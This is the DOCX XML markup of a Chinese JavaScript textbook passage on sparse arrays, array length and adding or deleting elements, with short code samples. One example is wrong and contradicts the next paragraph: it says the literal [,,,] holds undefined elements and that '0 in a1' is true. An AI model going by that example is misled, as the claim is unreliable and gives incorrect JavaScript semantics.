    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>既然数组是对象，那么它们可以从原型中继承元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，数组可以定义元素的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果一个数组确实继承了元素或使用了元素的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>你应该期望它使用非优化的代码路径：访问这种数组的元素的时间会与常规对象属性的查找时间相近。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="7_3_Xi_Shu_Shu_Zu_"/>
      <w:r>
        <w:t>7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　稀疏数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>稀疏数组就是包含从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始的不连续索引的数组。通常，数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值代表数组中元素的个数。如果数组是稀疏的，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值大于元素的个数。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数或简单地指定数组的索引值大于当前的数组长度来创建稀疏数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=new Array(5);//</w:t>
      </w:r>
      <w:r>
        <w:t>数组没有元素，但是</w:t>
      </w:r>
      <w:r>
        <w:t>a.length</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空数组，</w:t>
      </w:r>
      <w:r>
        <w:t>length=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[1000]=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>赋值添加一个元素，但是设置</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>后面会看到你也可以用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来生产稀疏数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>足够稀疏的数组通常在</w:t>
      </w:r>
      <w:r>
        <w:t>实现上比稠密的数组更慢、内存利用率更高，在这样的数组中查找元素的时间与常规对象属性的查找时间一样长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，当在数组直接量中省略值时不会创建稀疏数组。省略的元素在数组中是存在的，其值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。这和数组元素根本不存在是有一些微妙的区别的。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>操作符检测两者之间的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a1=[,,,];//</w:t>
      </w:r>
      <w:r>
        <w:t>数组是</w:t>
      </w:r>
      <w:r>
        <w:t>[undefined,undefined,undefined]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a2=new Array(3);//</w:t>
      </w:r>
      <w:r>
        <w:t>该数组根本没有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0 in a1//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:a1</w:t>
      </w:r>
      <w:r>
        <w:t>在索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>处有一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:a2</w:t>
      </w:r>
      <w:r>
        <w:t>在索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>处没有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环时，</w:t>
      </w:r>
      <w:r>
        <w:t>a1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:t>之间的区别也很明显（见</w:t>
      </w:r>
      <w:r>
        <w:t>7.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，当省略数组直接量中的值时（使用连续的逗号，比如</w:t>
      </w:r>
      <w:r>
        <w:t>[1,,3]</w:t>
      </w:r>
      <w:r>
        <w:t>），这时所得到的数组也是稀疏数组，省略掉的值是不存在的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a1=[,];//</w:t>
      </w:r>
      <w:r>
        <w:t>此数组没有元素，长度是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a2=[undefined];//</w:t>
      </w:r>
      <w:r>
        <w:t>此数组包含一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0 in a1//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:a1</w:t>
      </w:r>
      <w:r>
        <w:t>在索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>处没有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0 in </w:t>
      </w:r>
      <w:r>
        <w:t>a2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:a2</w:t>
      </w:r>
      <w:r>
        <w:t>在索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>处有一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一些旧版本的实现中（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3</w:t>
      </w:r>
      <w:r>
        <w:t>），在存在连续逗号的情况下，插入</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值的操作则与此不同，在这些实现中，</w:t>
      </w:r>
      <w:r>
        <w:t>[1,,3]</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>[1,undefined,3]</w:t>
      </w:r>
      <w:r>
        <w:t>是一模一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>了解稀疏数组是了解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组的真实本质的一部分。尽管如此，实际上你所碰到的绝大多数</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组不是稀疏数组。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>并且，如果你确实碰到了稀疏数组，你的代码很可能像对待非稀疏数组一样来对待它们，只不过它们包含一些</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="7_4_Shu_Zu_Chang_Du_"/>
      <w:r>
        <w:t>7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组长度</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组有一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，就是这个属性使其区别于常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象。针对稠密（也就是非稀疏）数组，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值代表数组中元素的个数。其值比数组中最大的索引大</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[].length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>数组没有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>['a','b','c'].length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:t>最大的索引为</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当数组是稀疏的时，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值大于元素的个数。而且关于此我们可以说的一切也就是数组长度保证大于它每个元素的索引值。或者，换一种说法，在数组中（无论稀疏与否）肯定找不到一个元素的索引值大于或等于它的长度。为了维持此规则不变化，数组有两个特殊的行为。第一个如同上面的描述：如果为一个数组元素赋值，它的索引</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>大于或等于现有数组的长度时，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值将设置为</w:t>
      </w:r>
      <w:r>
        <w:t>i+1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第二个特殊的行为就是设置</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个小于当前长度的非负整数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>时，当前数组中那些索引值大于或等于</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的元素将从中删除：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,</w:t>
      </w:r>
      <w:r>
        <w:t>2,3,4,5];//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个元素的数组开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除所有的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length=5;//</w:t>
      </w:r>
      <w:r>
        <w:t>长度为</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>，但是没有元素，就像</w:t>
      </w:r>
      <w:r>
        <w:t>new Array(5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还可以将数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值设置为大于其当前的长度。实际上这不会向数组中添加新的元素，它只是在数组尾部创建一个空的区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>让数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性变成只读的（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,2,3];/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个元素的数组开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(a,"length",{writable:false});//</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性只读</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length=0;//a</w:t>
      </w:r>
      <w:r>
        <w:t>不会改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似地，如果让一个数组元素不能配置，就不能删除它。如果不能删除它，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性不能设置为小于不可配置元素的索引值。（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="7_5_Shu_Zu_Yuan_Su_De_Tian_Jia_He_Shan_C"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组元素的添加和删除</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经见过添加数组元素最简单的方法：为新索引赋值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[]//</w:t>
      </w:r>
      <w:r>
        <w:t>开始是</w:t>
      </w:r>
      <w:r>
        <w:t>一个空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0]="zero";//</w:t>
      </w:r>
      <w:r>
        <w:t>然后向其中添加元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[1]="one";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在数组末尾增加一个或多个元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>开始是一个空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.push("zero")//</w:t>
      </w:r>
      <w:r>
        <w:t>在末尾添加一个元素。</w:t>
      </w:r>
      <w:r>
        <w:t>a=["zero"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.push("one","two")//</w:t>
      </w:r>
      <w:r>
        <w:t>再添加两个元素。</w:t>
      </w:r>
      <w:r>
        <w:t>a=["zero","one","two"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组尾部压入一个元素与给数组</w:t>
      </w:r>
      <w:r>
        <w:t>a[a.length]</w:t>
      </w:r>
      <w:r>
        <w:t>赋值是一样的。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（在</w:t>
      </w:r>
      <w:r>
        <w:t>7.8</w:t>
      </w:r>
      <w:r>
        <w:t>节有描述）在数组的首部插入一个元素，并且将其他元素依次移到更高的索引处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以像删除对象属性一样使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来删除数组元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete a[1];//a</w:t>
      </w:r>
      <w:r>
        <w:t>在索引</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的位置不再有元素</w:t>
      </w:r>
    </w:p>
